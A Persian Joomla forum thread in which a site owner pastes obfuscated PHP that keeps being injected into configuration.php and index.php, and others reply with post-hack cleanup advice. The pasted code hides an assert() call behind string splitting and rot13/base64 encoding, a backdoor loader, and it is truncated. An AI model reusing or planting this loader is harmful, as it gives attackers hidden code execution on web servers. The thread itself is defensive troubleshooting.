hossein_696

تزریق کد در فایل configuration.php

3 پست در این موضوع

با سلام خدمت دوستان

مدتیه که تو سایتی با جوملا 3.4 در فایل های configuration.php و index.php کد زیر تزریق میشه و در نهایت باعث میشه سایت بالا نیاد و صفحه سفید بشه.

با پاک کردن این کد و جایگزینی پوشه libraries جوملا، سایت بالا میاد. ولی هر چند روز این مسئله دوباره اتفاق میفته و تکرار میشه - دوستان لطفا راهنمایی کنن. سپاس

//###===###

error_reporting(0); 

$strings = "as";$strings .= "sert";

if (!@$mdc96972) {$mdc96972=1;@$strings(str_rot13('riny(onfr64_qrpbqr("VTyzXUA0paA0pvtxK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFjvq3NgoT9anJ4vXKk8p3Elp3ElXPEsH0IFIxIFJlWFEISIEIAHK1IFFFWqYPW3pP1uMT1covVcXJEcMGfxpG0xK1WSHIISH1EoVaRvKGgcMvtuDPEkXFEkCKA1LaA0pvtxK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFjkYQR0ZPx7WTM0CKA1LaA0pvtxpFjgAPj0XGgcMvNbXPEzqQ09Vv5jMTLvsUjxMaD9CFVhpaEzVak8WTM0CG0vYzEiLlW8sPEzqQ09Vv54oUZvsUjxMaD9CFVhpUO0Vak8WTM0CG0vpUO0rPW8sPEzqQ09Vv5iMUDvsUjxMaD9CFVho2EjVvxzWaA0pzkyovtxpFx+ZGNzWaA0pzkyovtxpFx8ZGZ1WvLupUWyM19gLKEwnPtvV1grLF16DF1nZP05KPIpYyksKPjgKFZvYPEkXFy7WUN9oJD1XUOlMJqspzIjoTSwMFtaWI53q3qpYvthXlxxWFpfVykpZFVfWS9GEIWJEIWoVxuHISOsFR9GIPWqXFx7WUH9LzSmMGL0K2EyL29xMFtvLGV1ZTAhIacxDmIdLwVjCFVcBlEwnQ1wqKWfK2yhnKDbVzu0qUN6Yl8vYvE1YvVipv8vYvEjY

Share this post


Link to post
Share on other sites
آموزش ووکامرس قالب جوملا قالب وردپرس قالب رایگان وردپرس قالب رایگان جوملا هاست نامحدود هاست جوملا هاست لاراول هاست وردپرس هاست ارزان هاست ربات تلگرام خرید دامنه آموزش ساخت ربات تلگرام با php آموزش لاراول آموزش cPanel آموزش php آموزش فرم ساز RSform آموزش ساخت ربات جذب ممبر آموزش ساخت ربات دوستیابی آموزش ساخت ربات فروشگاهی برای ووکامرس آموزش طراحی سایت داینامیک با php آموزش بخش پشتیبانی با rsticket

با سلام

خب بطور عمومی نبایستی همچین کدی اونهم بصورت کدشده در سورس فایل کانفیگتون وجود داشته باشه وبه نمایش در بیاد!

پیشنهاد میکنم اطلاعات هاستتون رو بطور کامل تغییر بدیدو یا اگر مقدور هستش به هاستینگ بگید سایت رو آخرین نسخه بکاپی که سالم بوده برگردونند چرا که احتمالا در سایر فایلهای سایتتون نفوذ انجام شده باشه و باگ و شل در سورس سایتتون آپلود شده باشه.

حتما حتما حتما از آخرین نسخه RSFirewall استفاده کنید.

تاپیکهای زیادی در انجمن با موضوع کارهایی که بعد هک میبایست انجام بشه وجود داره.مطالعه کنید اونها رو..

موفق و سربلند باشید

Share this post


Link to post
Share on other sites

با سلام و تشکر از پاسخ شما

کل سورس ها رو با روش مقایسه با فایل اصلی قالب ها، فایل های هسته جوملا، پلاگین ها و ماژولها مقایسه کردم. و پس از پیدا و حذف کردن کد تزریق شده در فایل های مختلف و چند فایل اضافی که ساخته شده بودند. مجددا وب سایت و آپلود کردم. ولی مجدد تزریق انجام میشه!

ممنون میشم دوستان چند مورد از دستوراتی که ممکن است در سورس جا سازی شده باشند را اعلام کنن.

Share this post


Link to post
Share on other sites

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری